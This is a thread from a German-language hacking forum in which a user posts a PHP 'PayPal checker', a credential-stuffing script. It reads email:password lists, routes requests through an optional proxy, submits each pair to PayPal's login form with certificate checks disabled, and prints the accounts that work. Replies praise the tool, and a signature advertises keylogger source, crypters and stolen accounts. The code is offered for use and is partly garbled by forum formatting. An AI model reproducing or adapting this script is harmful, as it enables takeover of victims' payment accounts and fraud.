Ergebnis 1 bis 5 von 5
  1. #1
    Sobig Wurm Avatar von jens3911
    Registriert seit
    18.03.2009
    Beiträge
    211

    Standard [PHP] Paypal Checker

    hier ist ein Paypal checker in php
    by: int3

    PHP-Code:
    <?php 
        
    //script that checks list paypal accounts 
        //by int3 
        //use php check-paypal.php filename [-p proxy[IMG]http://hackbase.cc/iSkin_Black/smilies/tongue.gif[/IMG]ort] 
        //filename is in email[IMG]http://hackbase.cc/iSkin_Black/smilies/tongue.gif[/IMG]assword to check format 
     
        //first get filename with list and proxy name 
        
    $file
        
    $proxy
        
    $proxy_port
        for (
    $i=0$i<$argc$i++) { 
            if (
    $argv[$i] == "-p") { 
                
    $i++; 
                
    $proxy substr($argv[$i], 0strpos($argv[$i], ":")); //get proxy server 
                
    $proxy_port substr($argv[$i], strpos($argv[$i], ":")+1); //get proxy port 
                
    echo "Using proxy: "$proxy":"$proxy_port"\n"
            } 
            else 
                
    $file $argv[$i]; 
        } 
        
    $handle fopen($file"r"); 
        while (!
    feof($handle)) { 
            
    $line fgets($handle); 
            
    $email trim(substr($line0strpos($line':'))); 
            
    $password trim(substr($linestrpos($line':')+1)); 
            
    check_paypal($email$password); 
        } 
        
    fclose($handle); 
     
        
    //check if specified paypal login works 
        
    function check_paypal($user$password) { 
            GLOBAL 
    $proxy$proxy_port
    $useragent "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) 
    "
    //firefox 
            //first get paypal cookie 
            
    $curl curl_init(); 
            
    curl_setopt($curlCURLOPT_URL"https://www.paypal.com/us/"); //URL 
            
    curl_setopt($curlCURLOPT_USERAGENT$useragent); 
            
    curl_setopt($curlCURLOPT_FOLLOWLOCATION1); 
            
    curl_setopt($curlCURLOPT_SSL_VERIFYPEERfalse); 
            
    curl_setopt($curlCURLOPT_SSL_VERIFYHOSTfalse); 
            if (isset(
    $proxy)) { 
                
    curl_setopt($curlCURLOPT_HTTPPROXYTUNNELtrue); 
                
    curl_setopt($curlCURLOPT_PROXYTYPECURLPROXY_HTTP); 
                
    curl_setopt($curlCURLOPT_PROXY$proxy); 
                
    curl_setopt($curlCURLOPT_PROXYPORT$proxy_port); 
            } 
            
    curl_setopt($curlCURLOPT_RETURNTRANSFER1); //return site as string 
            
    curl_setopt($curlCURLOPT_COOKIEFILE"cookie.txt"); 
            
    curl_setopt($curlCURLOPT_COOKIEJAR"cookie.txt"); 
            
    curl_exec($curl); 
            
    curl_close($curl); 
            
    //then login to paypal account 
    $data "login_email=" $user "&login_password=" $password "&target_page=0&submit.x=Log+In&form_charset=U TF-8&browser_name=undefined&browser 
    _version=undefined&operating_system=Windows&mid_pr  ofile="

            
    $curl curl_init(); 
            if (isset(
    $proxy)) { 
                
    curl_setopt($curlCURLOPT_HTTPPROXYTUNNELtrue); 
                
    curl_setopt($curlCURLOPT_PROXYTYPECURLPROXY_HTTP); 
                
    curl_setopt($curlCURLOPT_PROXY$proxy); 
                
    curl_setopt($curlCURLOPT_PROXYPORT$proxy_port); 
            } 
    curl_setopt($curlCURLOPT_URL"https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-submit&dispatch=5885d80a13c0db1fa798f5a5f5ae42e71c f8ee1e36 
    038233149a658e6082cfca"
    ); 
            
    curl_setopt($curlCURLOPT_USERAGENT$useragent); 
            
    curl_setopt($curlCURLOPT_REFERER"https://www.paypal.com/us/"); 
            
    curl_setopt($curlCURLOPT_POSTtrue); 
            
    curl_setopt($curlCURLOPT_POSTFIELDS$data); 
            
    curl_setopt($curlCURLOPT_COOKIEFILE"cookie.txt"); 
            
    curl_setopt($curlCURLOPT_COOKIEJAR"cookie.txt"); 
            
    curl_setopt($curlCURLOPT_SSL_VERIFYHOST3); 
            
    curl_setopt($curlCURLOPT_FOLLOWLOCATION1); 
            
    curl_setopt($curlCURLOPT_RETURNTRANSFER1); 
            
    curl_setopt($curlCURLOPT_SSL_VERIFYPEERFALSE); 
            
    $result curl_exec($curl); 
            
    curl_close($curl); 
            if (
    preg_match('/<title>Logging in - PayPal<\/title>/'$result)) 
                echo 
    $user':'$password"\n"//GOOD ACCOUNT 
        

    ?>
    Geändert von jens3911 (03.05.2009 um 10:37 Uhr)

  2. #2
    Kevin Lee Poulsen Avatar von VeN0m
    Registriert seit
    30.12.2008
    Beiträge
    1.270

    Standard

    Ist aber nicht von Dir oder was heißt das "//by int3"? Oder bist Du das? Scripte klauen ist nicht so unbedingt nett, sorry. Irgendwer hatte sich ja schließlich die Mühe gemacht .
    Come to the dark side - We have cookies

  3. #3
    W32.FunLove Avatar von Burn0ut
    Registriert seit
    20.04.2009
    Beiträge
    131

    Standard

    Sehr schön das ist ein Lob wert Zwar brauch ich es nicht aber du weist was ich meine das es klappt.

  4. #4
    Sobig Wurm Avatar von jens3911
    Registriert seit
    18.03.2009
    Beiträge
    211

    Standard

    Zitat Zitat von Power-Sven Beitrag anzeigen
    Ist aber nicht von Dir oder was heißt das "//by int3"? Oder bist Du das? Scripte klauen ist nicht so unbedingt nett, sorry. Irgendwer hatte sich ja schließlich die Mühe gemacht .
    habe es hinzugefügt, ich weis schon das scripte klauen nicht toll ist deswegen habe ich das //int3 auch gelassen! blos wenn hier leute dieses script brauchen und ich es nicht posten soll weil es von jemand anderes ist,ist das schon blöd


    [B] Steam Acc's, Fud Keyylogger source code + mail funktion

    [S]fudcrypter,Acc's,ICQ 6 uin'Z,3dl.am invite code

    Black Market Profil
    ( 0 |2| 0 )

  5. #5
    Kevin Lee Poulsen Avatar von VeN0m
    Registriert seit
    30.12.2008
    Beiträge
    1.270

    Standard

    Naja jetzt hast Du ja hinzugefügt "by: int3" in Deinem Beitrag. Das sah im ersten Moment nur so aus, als sei es von Dir bis ich den Kommentar im Sourcecode gesehen hatte. Ich finds natürlich klasse, dass Du Deine gefundenen Scripte mit uns teilst. Vor allem lässt sich so ein Paypal-Checker sehr gut nutzen. Okay... Ich brauche es nicht aber ist schon ziemlich gut, danke.
    Come to the dark side - We have cookies

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •